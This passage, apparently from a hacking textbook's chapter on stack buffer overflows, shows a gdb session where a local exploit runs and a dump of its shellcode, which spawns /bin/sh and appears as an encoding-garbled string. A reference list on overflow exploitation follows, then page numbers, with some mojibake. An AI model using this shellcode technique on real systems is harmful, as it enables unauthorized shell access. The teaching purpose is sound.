c # after adding \xcc before shellcode
# gdb exploit2 --quiet
(no debugging symbols found)...(gdb)
(gdb) run
Starting program: /root/book/exploit2
[***] using address: 0xbfffffc2
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000b00 in _start () from /lib/ld-linux.so.2
(gdb) x/20s 0xbfffffc2 /*this was output from exploit2 above */
0xbfffffc2:
"?«\037^\211v\b1??\210F\a\211F\f?°\v\211??\215N\b\215V\f??\2001?›\211??@??\200??????????
bin/sh"
0xbffffff0: "./smallbuff"
0xbffffffc: ""
0xbffffffd: ""
0xbffffffe: ""
0xbfffffff: ""
0xc0000000:
0xc0000000:
References
Jon Erickson, Hacking: The Art of Exploitation (San Francisco: No Starch Press, 2003)
Murat??™s Explanation of Buffer Overflows www.enderunix.org/docs/eng/bof-eng.txt
???Smashing the Stack??? www.phrack.org/archives/49/P49-14
PowerPoint Presentation on Buffer Overflows http://security.dico.unimi.it/~sullivan/
stack-bof-en.ppt
Core Security http://packetstormsecurity.nl/papers/general/core_vulnerabilities.pdf
Buffer Overflow Exploits Tutorial http://mixter.void.ru/exploit.html
Writing Shellcode www.
Pages:
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337